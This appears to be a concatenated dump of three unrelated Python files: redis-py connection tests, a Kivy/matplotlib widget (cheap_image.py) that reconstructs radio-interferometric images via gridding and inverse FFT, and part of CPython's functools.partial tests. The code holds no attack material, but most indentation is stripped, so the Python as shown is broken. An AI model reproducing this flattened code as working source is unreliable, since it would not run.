connection = redis.Redis.from_url('redis://localhost')
pool = connection.connection_pool
assert re.match('(.*)<(.*)<(.*)>>', repr(pool)).groups() == (
'ConnectionPool',
'Connection',
'host=localhost,port=6379,db=0,client_name=',
)
@skip_if_server_version_lt('2.6.9')
    def test_connect_from_url_tcp_with_client_name(self):
connection = redis.Redis.from_url('redis://localhost',
client_name='testing')
pool = connection.connection_pool
assert re.match('(.*)<(.*)<(.*)>>', repr(pool)).groups() == (
'ConnectionPool',
'Connection',
'host=localhost,port=6379,db=0,client_name=testing',
)
def test_connect_from_url_unix(self):
connection = redis.Redis.from_url('unix:///path/to/socket')
pool = connection.connection_pool
assert re.match('(.*)<(.*)<(.*)>>', repr(pool)).groups() == (
'ConnectionPool',
'UnixDomainSocketConnection',
'path=/path/to/socket,db=0,client_name=',
)
@skip_if_server_version_lt('2.6.9')
    def test_connect_from_url_unix_with_client_name(self):
connection = redis.Redis.from_url('unix:///path/to/socket',
client_name='testing')
pool = connection.connection_pool
assert re.match('(.*)<(.*)<(.*)>>', repr(pool)).groups() == (
'ConnectionPool',
'UnixDomainSocketConnection',
'path=/path/to/socket,db=0,client_name=testing',
)
@skip_if_server_version_lt('2.6.9')
def test_name(self, r):
connection = redis.Redis(client_name='testing')
assert connection.client_getname() == 'testing'
|
cheap_image.py
|
__cheap_image_perf__ = False
if (__cheap_image_perf__) :
import time
print("--- %15.8g --- cheap_image.py start"%(time.perf_counter()))
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.image as mi
import matplotlib.tri as tri
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure
if (__cheap_image_perf__) :
print("--- %15.8g --- imported matplotlib"%(time.perf_counter()))
from kivy.clock import Clock
from kivy.uix.widget import Widget
from kivy.core.window import Window
from kivy.graphics import RenderContext, Color, Rectangle, BindTexture
from kivy.graphics.texture import Texture
from kivy.properties import ListProperty, NumericProperty
if (__cheap_image_perf__) :
print("--- %15.8g --- imported kivy"%(time.perf_counter()))
from array import array
if (__cheap_image_perf__) :
print("--- %15.8g --- imported array"%(time.perf_counter()))
# import threading
# import time
# Data dictionary: datadict has form {'u':u,'v':v,'V':V,'s1':s1d,'s2':s2d,'t':t,'err':err}
# Station dictionary: statdict has form {<station code>:{'on':<True/False>,'name':<name>,'loc':(x,y,z)}}
__cheap_image_debug__ = False
class InteractivePlotWidget(Widget):
tex_coords = ListProperty([0, 1, 1, 1, 1, 0, 0, 0])
default_zoom_factor = NumericProperty(1.0)
def __init__(self, **kwargs):
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractivePlotWidget.__init__ start"%(time.perf_counter()))
self.canvas = RenderContext()
self.nx = 1024
self.ny = self.nx
# print("On init:",self.nx,self.ny)
with self.canvas:
Color(1, 1, 1)
self.texture = Texture.create(size=(self.nx,self.ny))
# self.buf = [0,0,0,255]*(self.nx*self.ny)
# self.arr = array('B',self.buf)
self.arr = bytearray([0,0,0,255]*(self.nx*self.ny))
# self.update_mpl()
self.texture.blit_buffer(self.arr, colorfmt='rgba', bufferfmt='ubyte')
BindTexture(texture=self.texture, index=0)
self.texture.wrap = 'clamp_to_edge'
# create a rectangle on which to plot texture (will be at index 0)
Color(1,1,1)
self.rect = Rectangle(size=(self.default_zoom_factor*self.nx,self.default_zoom_factor*self.ny),texture=self.texture)
self.rect.tex_coords = self.tex_coords
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractivePlotWidget.__init__ made canvas"%(time.perf_counter()))
self.plot_frozen = False
# call the constructor of parent
# if they are any graphics objects, they will be added on our new
# canvas
super(InteractivePlotWidget, self).__init__(**kwargs)
# We'll update our glsl variables in a clock
# Clock.schedule_interval(self.update_glsl, 0)
Clock.schedule_interval(self.texture_init, 0)
# Generate some default resizing behaviors
self.bind(height=self.resize)
self.bind(width=self.resize)
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractivePlotWidget.__init__ done"%(time.perf_counter()))
def update_glsl(self, *largs):
# This is needed for the default vertex shader.
self.canvas['projection_mat'] = Window.render_context['projection_mat']
self.canvas['modelview_mat'] = Window.render_context['modelview_mat']
def texture_init(self, *args):
self.texture = self.canvas.children[-1].texture
self.update_glsl()
def on_touch_move(self,touch) :
if (not self.plot_frozen) :
x_shift = - touch.dpos[0]/float(self.rect.size[0])
y_shift = touch.dpos[1]/float(self.rect.size[1])
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
def on_touch_down(self,touch) :
if (touch.is_double_tap) :
self.tex_coords = [0, 1, 1, 1, 1, 0, 0, 0]
self.rect.tex_coords = self.tex_coords
maxwidth = self.default_zoom_factor*max(self.width,self.height*self.nx/self.ny)
self.rect.size = self.check_size((maxwidth,self.ny*maxwidth/self.nx))
self.rect.pos = (0.5*(self.width-self.rect.size[0]),(self.height-self.rect.size[1]))
x_shift = 0.0
y_shift = -0.5*(self.height-self.rect.size[1])/self.rect.size[1]
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
def zoom_in(self) :
if (__cheap_image_debug__) :
print("InteractivePlotWidget.zoom_in:",self.rect.tex_coords,self.height)
old_size = self.rect.size
self.rect.size = self.check_size((self.rect.size[0]*1.414,self.rect.size[1]*1.414))
self.rect.pos = (0.5*(self.width-self.rect.size[0]),(self.height-self.rect.size[1]))
y_shift = 0.5 * (self.rect.size[0]/old_size[0]-1.0) * self.height/self.rect.size[1]
x_shift = 0
if (__cheap_image_debug__) :
print("InteractivePlotWidget.zoom_in:",old_size,self.rect.size,y_shift)
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
if (__cheap_image_debug__) :
print(" :",self.rect.tex_coords,self.height)
def zoom_out(self) :
old_size = self.rect.size
self.rect.size = self.check_size((self.rect.size[0]*0.707,self.rect.size[1]*0.707))
self.rect.pos = (0.5*(self.width-self.rect.size[0]),(self.height-self.rect.size[1]))
y_shift = 0.5 * (self.rect.size[0]/old_size[0]-1.0) * self.height/self.rect.size[1]
x_shift = 0
if (__cheap_image_debug__) :
print("InteractivePlotWidget.zoom_out:",old_size,self.rect.size,y_shift)
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
def resize(self,widget,newsize) :
if (__cheap_image_debug__) :
print("InteractivePlotWidget.resize:",newsize)
self.tex_coords = [0, 1, 1, 1, 1, 0, 0, 0]
self.rect.tex_coords = self.tex_coords
maxwidth = self.default_zoom_factor*max(self.width,self.height*self.nx/self.ny)
self.rect.size = self.check_size((maxwidth,self.ny*maxwidth/self.nx))
self.rect.pos = (0.5*(self.width-self.rect.size[0]),(self.height-self.rect.size[1]))
x_shift = 0.0
y_shift = -0.5*(self.height-self.rect.size[1])/self.rect.size[1]
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
# def set_zoom_factor(self,value) :
# self.rect.size = self.check_size([self.nx*value,self.ny*value])
# x_shift = -0.5*(self.width-self.rect.size[0])/float(self.rect.size[0])
# y_shift = 0.5*(self.height-self.rect.size[1])/float(self.rect.size[1])
# self.tex_coords = [0, 1, 1, 1, 1, 0, 0, 0]
# for i in range(0,8,2) :
# self.tex_coords[i] = self.tex_coords[i] + x_shift
# self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
# self.tex_coords = self.check_boundaries(self.tex_coords)
# self.rect.tex_coords = self.tex_coords
# self.rect.pos = (max(0,0.5*(self.width-self.rect.size[0])),(self.height-self.rect.size[1]))
def set_zoom_factor(self,value) :
if (__cheap_image_debug__) :
print("InteractivePlotWidget.set_zoom_factor:",self.rect.tex_coords,self.height)
old_size = self.rect.size
self.rect.size = self.check_size((self.nx*value,self.ny*value))
self.rect.pos = (0.5*(self.width-self.rect.size[0]),(self.height-self.rect.size[1]))
y_shift = 0.5 * (self.rect.size[0]/old_size[0]-1.0) * self.height/self.rect.size[1]
x_shift = 0
if (__cheap_image_debug__) :
print("InteractivePlotWidget.set_zoom_factor:",old_size,self.rect.size,y_shift)
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
if (__cheap_image_debug__) :
print(" :",self.rect.tex_coords,self.height)
def check_boundaries(self,tex_coords) :
new_tex_coords = [0]*len(tex_coords)
max_x_shift = max((self.rect.size[0]-self.width)/self.rect.size[0],0)
new_tex_coords[0] = max(min(tex_coords[0],max_x_shift),0)
new_tex_coords[2] = max(min(tex_coords[2],1+max_x_shift),1)
new_tex_coords[4] = max(min(tex_coords[4],1+max_x_shift),1)
new_tex_coords[6] = max(min(tex_coords[6],max_x_shift),0)
max_y_shift = max((self.rect.size[1]-self.height)/self.rect.size[1],0)
new_tex_coords[1] = max(min(tex_coords[1],1+max_y_shift),1)
new_tex_coords[3] = max(min(tex_coords[3],1+max_y_shift),1)
new_tex_coords[5] = max(min(tex_coords[5],max_y_shift),0)
new_tex_coords[7] = max(min(tex_coords[7],max_y_shift),0)
return new_tex_coords
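        # Worked example of the clamping above (numbers are illustrative): for a
        # rectangle 2048 px wide shown in a 1024 px wide widget,
        # max_x_shift = (2048 - 1024) / 2048 = 0.5, so the left-edge u coordinates
        # may pan within [0, 0.5] and the right-edge ones within [1, 1.5]; once the
        # rectangle is narrower than the widget the shift clamps to 0 and no
        # horizontal panning is allowed. The y clamping works the same way.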
def check_size(self,size) :
return size
def update_mpl(self,**kwargs) :
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractivePlotWidget.update_mpl start"%(time.perf_counter()))
# print("Started update_mpl in thread")
fig = Figure(figsize=(self.nx/64,self.ny/64),dpi=64)
canvas = FigureCanvas(fig)
ax = fig.add_subplot(111,position=[0,0,1,1])
self.generate_mpl_plot(fig,ax,**kwargs)
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractivePlotWidget.update_mpl generated mpl"%(time.perf_counter()))
# print("Made mpl plot in update_mpl in thread")
canvas.draw()
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractivePlotWidget.update_mpl drew canvas"%(time.perf_counter()))
# print("Drew canvas in update_mpl in thread")
# self.buf = np.asarray(canvas.buffer_rgba()).ravel()
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractivePlotWidget.update_mpl cast to buf"%(time.perf_counter()))
# print("Assigned buf in update_mpl in thread")
# self.arr = array('B', self.buf)
# self.arr = bytearray(self.buf)
self.arr = bytearray(np.asarray(canvas.buffer_rgba()).ravel())
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractivePlotWidget.update_mpl cast to byte array"%(time.perf_counter()))
# print("Assigned arr in update_mpl in thread")
self.texture.blit_buffer(self.arr, colorfmt='rgba', bufferfmt='ubyte')
# print("Finished update_mpl in thread")
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractivePlotWidget.update_mpl done"%(time.perf_counter()))
def generate_mpl_plot(self,fig,ax,**kwargs) :
# This is where we insert a Matplotlib figure. Must use ax. and fig. child commands.
pass
class InteractiveImageReconstructionPlot(InteractivePlotWidget) :
def __init__(self,**kwargs) :
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.__init__ start"%(time.perf_counter()))
self.xarr = 0
self.yarr = 0
self.Iarr = 1
self.ddict = {}
self.sdict = {}
# self.argument_hash = None
super().__init__(**kwargs)
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.__init__ done"%(time.perf_counter()))
##########
# Low-level image reconstruction function
def reconstruct_image(self,datadict,statdict,time_range=None,snr_cut=None,ngeht_diameter=6,f=2,method='cubic',make_hermitian=False,ad_hoc_phasing=False) :
# print("Started image reconstruction in thread")
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.reconstruct_image start"%(time.perf_counter()))
# Useful constant
uas2rad = np.pi/180.0/3600e6
# Exclude stations not in array
stations = list(np.unique(np.array(list(statdict.keys()))))
keep = np.array([ (datadict['s1'][j] in stations) and (datadict['s2'][j] in stations) for j in range(len(datadict['s1'])) ])
ddtmp = {}
for key in ['u','v','V','s1','s2','t','err'] :
ddtmp[key] = datadict[key][keep]
if (len(ddtmp['u'])==0) :
return None,None,None
# Exclude stations that are "off"
keep = np.array([ statdict[ddtmp['s1'][j]]['on'] and statdict[ddtmp['s2'][j]]['on'] for j in range(len(ddtmp['s1'])) ])
ddnew = {}
for key in ['u','v','V','s1','s2','t','err'] :
ddnew[key] = ddtmp[key][keep]
if (len(ddnew['u'])==0) :
return None,None,None
# Exclude data points outside the specified time range
if (not time_range is None) :
keep = (ddnew['t']>=time_range[0])*(ddnew['t']<time_range[1])
for key in ['u','v','V','s1','s2','t','err'] :
ddnew[key] = ddnew[key][keep]
if (len(ddnew['u'])==0) :
return None,None,None
# Cut points with S/N less than the specified minimum value
if (not snr_cut is None) and snr_cut>0:
# Get a list of error adjustments based on stations
diameter_correction_factor = {}
for s in stations :
if (statdict[s]['exists']) :
diameter_correction_factor[s] = 1.0
else :
diameter_correction_factor[s] = statdict[s]['diameter']/ngeht_diameter
# Baseline-by-baseline filtering
# keep = np.array([ np.abs(ddnew['V'][j])/(ddnew['err'][j].real * diameter_correction_factor[ddnew['s1'][j]] * diameter_correction_factor[ddnew['s2'][j]]) > snr_cut for j in range(len(ddnew['s1'])) ])
# Ad hoc phasing
keep = np.array([True]*len(ddnew['s1']))
jtot = np.arange(ddnew['t'].size)
for tscan in np.unique(ddnew['t']) :
inscan = (ddnew['t']==tscan)
s1_scan = ddnew['s1'][inscan]
s2_scan = ddnew['s2'][inscan]
                # S/N uses the visibility amplitude, matching the per-baseline filter commented out above
                snr_scan = np.array([ np.abs(ddnew['V'][inscan][j])/( ddnew['err'][inscan][j].real * diameter_correction_factor[s1_scan[j]] * diameter_correction_factor[s2_scan[j]] ) for j in range(len(s1_scan)) ])
detection_station_list = []
for ss in np.unique(np.append(s1_scan,s2_scan)) :
snr_scan_ss = np.append(snr_scan[s1_scan==ss],snr_scan[s2_scan==ss])
if np.any(snr_scan_ss > snr_cut ) :
detection_station_list.append(ss)
keep[jtot[inscan]] = np.array([ (s1_scan[k] in detection_station_list) and (s2_scan[k] in detection_station_list) for k in range(len(s1_scan)) ])
for key in ['u','v','V','s1','s2','t','err'] :
ddnew[key] = ddnew[key][keep]
if (len(ddnew['u'])==0) :
return None,None,None
        # Double up the data to make V hermitian
if (make_hermitian) :
ddnew['u'] = np.append(ddnew['u'],-ddnew['u'])
ddnew['v'] = np.append(ddnew['v'],-ddnew['v'])
ddnew['V'] = np.append(ddnew['V'],np.conj(ddnew['V']))
if (len(ddnew['u'])<=2) :
return None,None,None
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.reconstruct_image station selection done"%(time.perf_counter()))
# Get the region on which to compute gridded visibilities
umax = np.max(ddnew['u'])
vmax = np.max(ddnew['v'])
u2,v2 = np.meshgrid(np.linspace(-f*umax,f*umax,256),np.linspace(-f*vmax,f*vmax,256))
# SciPy
# pts = np.array([ddnew['u'],ddnew['v']]).T
# V2r = si.griddata(pts,np.real(ddnew['V']),(u2,v2),method=method,fill_value=0.0)
# V2i = si.griddata(pts,np.imag(ddnew['V']),(u2,v2),method=method,fill_value=0.0)
        # Matplotlib
triang = tri.Triangulation(ddnew['u'], ddnew['v'])
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.reconstruct_image triangulation done"%(time.perf_counter()))
if (method=='linear') :
V2r = np.array(np.ma.fix_invalid(tri.LinearTriInterpolator(triang, np.real(ddnew['V']))(u2,v2),fill_value=0.0))
V2i = np.array(np.ma.fix_invalid(tri.LinearTriInterpolator(triang, np.imag(ddnew['V']))(u2,v2),fill_value=0.0))
elif (method=='cubic') :
# V2r = np.array(np.ma.fix_invalid(tri.CubicTriInterpolator(triang, np.real(ddnew['V']),kind='geom')(u2,v2),fill_value=0.0))
# V2i = np.array(np.ma.fix_invalid(tri.CubicTriInterpolator(triang, np.imag(ddnew['V']),kind='geom')(u2,v2),fill_value=0.0))
V2r = np.array(np.ma.fix_invalid(tri.CubicTriInterpolator(triang, ddnew['V'].real,kind='geom')(u2,v2),fill_value=0.0))
V2i = np.array(np.ma.fix_invalid(tri.CubicTriInterpolator(triang, ddnew['V'].imag,kind='geom')(u2,v2),fill_value=0.0))
else :
print("ERROR: method %s not implemented"%(method))
V2 = V2r + 1.0j*V2i
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.reconstruct_image interpolation done"%(time.perf_counter()))
### Filter to smooth at edges
# Cosine filter
# V2 = V2 * np.cos(u2/umax*0.5*np.pi) * np.cos(v2/vmax*0.5*np.pi)
# Blackman filter
# hu = 0.42 - 0.5*np.cos(2.0*np.pi*(u2+umax)/(2*umax)) + 0.08*np.cos(4.0*np.pi*(u2+umax)/(2*umax))
# hv = 0.42 - 0.5*np.cos(2.0*np.pi*(v2+umax)/(2*umax)) + 0.08*np.cos(4.0*np.pi*(v2+umax)/(2*umax))
# V2 = V2*hu*hv
# Gaussian beam filter
uvmax2 = np.max(ddnew['u']**2+ddnew['v']**2)
gaussian_filter = np.exp(-np.pi**2*(u2**2+v2**2)/(4.0*np.log(2.0)*uvmax2))
V2 = V2*gaussian_filter
# Generate the x,y grid on which to image
x1d = np.fft.fftshift(np.fft.fftfreq(u2.shape[0],d=(u2[1,1]-u2[0,0])*1e9)/uas2rad)
y1d = np.fft.fftshift(np.fft.fftfreq(v2.shape[1],d=(v2[1,1]-v2[0,0])*1e9)/uas2rad)
xarr,yarr = np.meshgrid(-x1d,-y1d)
# Compute image estimate via FFT
Iarr = np.fft.fftshift(np.real(np.fft.ifft2(np.fft.ifftshift(V2))))
# Iarr = np.fft.fftshift(np.abs(np.fft.ifft2(np.fft.ifftshift(V2))))
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.reconstruct_image iFFT done"%(time.perf_counter()))
# print("Finished image reconstruction in thread")
# Return
return xarr,yarr,Iarr
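        # Summary of the estimate returned above (a plain "dirty image", no
        # deconvolution): (1) baselines are filtered by array membership, on/off
        # state, time range and per-scan S/N; (2) the irregular (u,v) samples are
        # interpolated onto a regular 256x256 grid with matplotlib.tri;
        # (3) a Gaussian taper matched to the longest baseline smooths the grid
        # edges to zero; (4) the gridded visibilities are inverse-FFTed and the
        # real part kept. The x/y axes come from np.fft.fftfreq of the grid
        # spacing and are converted from radians to micro-arcseconds via uas2rad.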
def estimate_dynamic_range(self,x,y,I) :
peak_flux = np.max(I)
peak_negative_flux = np.max(np.maximum(-I,0.0))
return peak_flux/peak_negative_flux
def generate_mpl_plot(self,fig,ax,**kwargs) :
if (__cheap_image_debug__) :
print("InteractiveImageReconstructionPlot.generate_mpl_plot: start")
# This is where we insert a Matplotlib figure. Must use ax. and fig. child commands.
# You probably want, but do not require, the following in your over-lay
self.plot_image_reconstruction(ax,self.ddict,self.sdict,**kwargs)
ax.set_facecolor((0,0,0,1))
fig.set_facecolor((0,0,0,1))
def update(self,datadict,statdict,**kwargs) :
self.sdict = statdict
self.ddict = datadict
# print("Started update, initiating thread:",kwargs)
self.update_mpl(**kwargs)
# # create the thread to invoke other_func with arguments (2, 5)
# andrews_specific_name = threading.Thread(target=self.update_mpl, kwargs=kwargs)
# # # set daemon to true so the thread dies when app is closed
# andrews_specific_name.daemon = True
# # start the thread
# andrews_specific_name.start()
# # wait for end for now
# andrews_specific_name.join()
# #time.sleep(10) # HACK
# print("Finished update, should have finished thread")
def replot(self,datadict,statdict,**kwargs) :
self.sdict = statdict
self.ddict = datadict
self.update_mpl(**kwargs)
# print("Started replot, initiating thread")
# # create the thread to invoke other_func with arguments (2, 5)
# t = threading.Thread(target=self.update_mpl, kwargs=kwargs)
# # # set daemon to true so the thread dies when app is closed
# # t.daemon = True
# # start the thread
# t.start()
# # wait for end for now
# t.join()
# print("Finished replot, should have finished thread")
def check_boundaries(self,tex_coords) :
return tex_coords
def check_size(self,size) :
if (size[0]<self.width) :
size = (self.width, size[1]/size[0] * self.width)
elif (size[1]<self.height) :
size = (size[0]/size[1] * self.height, self.height)
return size
############
# High-level plot generation
def plot_image_reconstruction(self,axs,datadict,statdict,time_range=None,snr_cut=None,ngeht_diameter=6,limits=None,show_map=True,show_contours=True) :
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.plot_image_reconstruction start"%(time.perf_counter()))
if (len(statdict.keys())==0) :
return
# Reconstruct image
self.xarr,self.yarr,self.Iarr=self.reconstruct_image(datadict,statdict,time_range=time_range,snr_cut=snr_cut,ngeht_diameter=ngeht_diameter)
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.plot_image_reconstruction reconstruction done"%(time.perf_counter()))
self.replot_image_reconstruction(axs,time_range=time_range,limits=limits,show_map=show_map,show_contours=show_contours)
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.plot_image_reconstruction done"%(time.perf_counter()))
############
# High-level plot generation
def replot_image_reconstruction(self,axs,time_range=None,limits=None,show_map=True,show_contours=True) :
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.replot_image_reconstruction start"%(time.perf_counter()))
if (self.Iarr is None) :
axs.text(0.5,0.5,"Insufficient Data!",color='w',fontsize=24,ha='center',va='center')
return
# Plot linear image
if (show_map) :
axs.imshow(self.Iarr,origin='lower',extent=[self.xarr[0,0],self.xarr[0,-1],self.yarr[0,0],self.yarr[-1,0]],cmap='afmhot',vmin=0,interpolation='spline16')
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.replot_image_reconstruction image plotted"%(time.perf_counter()))
# Plot the log contours
if (show_contours) :
lI = np.log10(np.maximum(0.0,self.Iarr)/np.max(self.Iarr)+1e-20)
lmI = np.log10(np.maximum(0.0,-self.Iarr)/np.max(self.Iarr)+1e-20)
lev10lo = max(np.min(lI[self.Iarr>0]),-4)
lev10 = np.sort( -np.arange(0,lev10lo,-1) )
axs.contour(self.xarr,self.yarr,-lI,levels=lev10,colors='cornflowerblue',alpha=0.5)
#plt.contour(self.x,self.y,-lmI,levels=lev10,colors='green',alpha=0.5)
lev1 = []
for l10 in -lev10[1:] :
lev1.extend( np.log10(np.array([2,3,4,5,6,7,8,9])) + l10 )
lev1 = np.sort(-np.array(lev1))
axs.contour(self.xarr,self.yarr,-lI,levels=lev1,colors='cornflowerblue',alpha=0.5,linewidths=0.5)
axs.contour(self.xarr,self.yarr,-lmI,levels=lev1[-10:],colors='green',alpha=0.5,linewidths=0.5)
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.replot_image_reconstruction contours plotted"%(time.perf_counter()))
# Fix the limits
if (not limits is None) :
axs.set_xlim((limits[0],limits[1]))
axs.set_ylim((limits[2],limits[3]))
else :
xmin = min(np.min(self.xarr[lI>-2]),np.min(self.yarr[lI>-2]))
xmax = max(np.max(self.xarr[lI>-2]),np.max(self.yarr[lI>-2]))
axs.set_xlim((xmax,xmin))
axs.set_ylim((xmin,xmax))
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractiveImageReconstructionPlot.replot_image_reconstruction done"%(time.perf_counter()))
|
test_functools.py
|
import abc
import builtins
import collections
import collections.abc
import copy
from itertools import permutations, chain
import pickle
from random import choice
import sys
from test import support
import threading
import time
import typing
import unittest
import unittest.mock
import os
import weakref
import gc
from weakref import proxy
import contextlib
from test.support import threading_helper
from test.support.script_helper import assert_python_ok
import functools
py_functools = support.import_fresh_module('functools', blocked=['_functools'])
c_functools = support.import_fresh_module('functools', fresh=['_functools'])
decimal = support.import_fresh_module('decimal', fresh=['_decimal'])
@contextlib.contextmanager
def replaced_module(name, replacement):
original_module = sys.modules[name]
sys.modules[name] = replacement
try:
yield
finally:
sys.modules[name] = original_module
def capture(*args, **kw):
"""capture all positional and keyword arguments"""
return args, kw
def signature(part):
""" return the signature of a partial object """
return (part.func, part.args, part.keywords, part.__dict__)
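# Example of the two helpers above: capture(1, 2, a=3) returns ((1, 2), {'a': 3}),
# and signature(functools.partial(capture, 1, a=3)) returns
# (capture, (1,), {'a': 3}, {}), i.e. func, positional args, keywords, instance dict.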
class MyTuple(tuple):
pass
class BadTuple(tuple):
def __add__(self, other):
return list(self) + list(other)
class MyDict(dict):
pass
class TestPartial:
def test_basic_examples(self):
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertTrue(callable(p))
self.assertEqual(p(3, 4, b=30, c=40),
((1, 2, 3, 4), dict(a=10, b=30, c=40)))
p = self.partial(map, lambda x: x*10)
self.assertEqual(list(p([1,2,3,4])), [10, 20, 30, 40])
def test_attributes(self):
p = self.partial(capture, 1, 2, a=10, b=20)
# attributes should be readable
self.assertEqual(p.func, capture)
self.assertEqual(p.args, (1, 2))
self.assertEqual(p.keywords, dict(a=10, b=20))
def test_argument_checking(self):
self.assertRaises(TypeError, self.partial) # need at least a func arg
try:
self.partial(2)()
except TypeError:
pass
else:
self.fail('First arg not checked for callability')
def test_protection_of_callers_dict_argument(self):
# a caller's dictionary should not be altered by partial
def func(a=10, b=20):
return a
d = {'a':3}
p = self.partial(func, a=5)
self.assertEqual(p(**d), 3)
self.assertEqual(d, {'a':3})
p(b=7)
self.assertEqual(d, {'a':3})
def test_kwargs_copy(self):
# Issue #29532: Altering a kwarg dictionary passed to a constructor
# should not affect a partial object after creation
d = {'a': 3}
p = self.partial(capture, **d)
self.assertEqual(p(), ((), {'a': 3}))
d['a'] = 5
self.assertEqual(p(), ((), {'a': 3}))
def test_arg_combinations(self):
# exercise special code paths for zero args in either partial
# object or the caller
p = self.partial(capture)
self.assertEqual(p(), ((), {}))
self.assertEqual(p(1,2), ((1,2), {}))
p = self.partial(capture, 1, 2)
self.assertEqual(p(), ((1,2), {}))
self.assertEqual(p(3,4), ((1,2,3,4), {}))
def test_kw_combinations(self):
# exercise special code paths for no keyword args in
# either the partial object or the caller
p = self.partial(capture)
self.assertEqual(p.keywords, {})
self.assertEqual(p(), ((), {}))
self.assertEqual(p(a=1), ((), {'a':1}))
p = self.partial(capture, a=1)
self.assertEqual(p.keywords, {'a':1})
self.assertEqual(p(), ((), {'a':1}))
self.assertEqual(p(b=2), ((), {'a':1, 'b':2}))
# keyword args in the call override those in the partial object
self.assertEqual(p(a=3, b=2), ((), {'a':3, 'b':2}))
def test_positional(self):
# make sure positional arguments are captured correctly
for args in [(), (0,), (0,1), (0,1,2), (0,1,2,3)]:
p = self.partial(capture, *args)
expected = args + ('x',)
got, empty = p('x')
self.assertTrue(expected == got and empty == {})
def test_keyword(self):
# make sure keyword arguments are captured correctly
for a in ['a', 0, None, 3.5]:
p = self.partial(capture, a=a)
expected = {'a':a,'x':None}
empty, got = p(x=None)
self.assertTrue(expected == got and empty == ())
def test_no_side_effects(self):
# make sure there are no side effects that affect subsequent calls
p = self.partial(capture, 0, a=1)
args1, kw1 = p(1, b=2)
self.assertTrue(args1 == (0,1) and kw1 == {'a':1,'b':2})
args2, kw2 = p()
self.assertTrue(args2 == (0,) and kw2 == {'a':1})
def test_error_propagation(self):
def f(x, y):
x / y
self.assertRaises(ZeroDivisionError, self.partial(f, 1, 0))
self.assertRaises(ZeroDivisionError, self.partial(f, 1), 0)
self.assertRaises(ZeroDivisionError, self.partial(f), 1, 0)
self.assertRaises(ZeroDivisionError, self.partial(f, y=0), 1)
def test_weakref(self):
f = self.partial(int, base=16)
p = proxy(f)
self.assertEqual(f.func, p.func)
f = None
self.assertRaises(ReferenceError, getattr, p, 'func')
def test_with_bound_and_unbound_methods(self):
data = list(map(str, range(10)))
join = self.partial(str.join, '')
self.assertEqual(join(data), '0123456789')
join = self.partial(''.join)
self.assertEqual(join(data), '0123456789')
def test_nested_optimization(self):
partial = self.partial
inner = partial(signature, 'asdf')
nested = partial(inner, bar=True)
flat = partial(signature, 'asdf', bar=True)
self.assertEqual(signature(nested), signature(flat))
def test_nested_partial_with_attribute(self):
# see issue 25137
partial = self.partial
def foo(bar):
return bar
p = partial(foo, 'first')
p2 = partial(p, 'second')
p2.new_attr = 'spam'
self.assertEqual(p2.new_attr, 'spam')
def test_repr(self):
args = (object(), object())
args_repr = ', '.join(repr(a) for a in args)
kwargs = {'a': object(), 'b': object()}
kwargs_reprs = ['a={a!r}, b={b!r}'.format_map(kwargs),
'b={b!r}, a={a!r}'.format_map(kwargs)]
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
self.assertEqual(f'{name}({capture!r})', repr(f))
f = self.partial(capture, *args)
self.assertEqual(f'{name}({capture!r}, {args_repr})', repr(f))
f = self.partial(capture, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
f = self.partial(capture, *args, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {args_repr}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
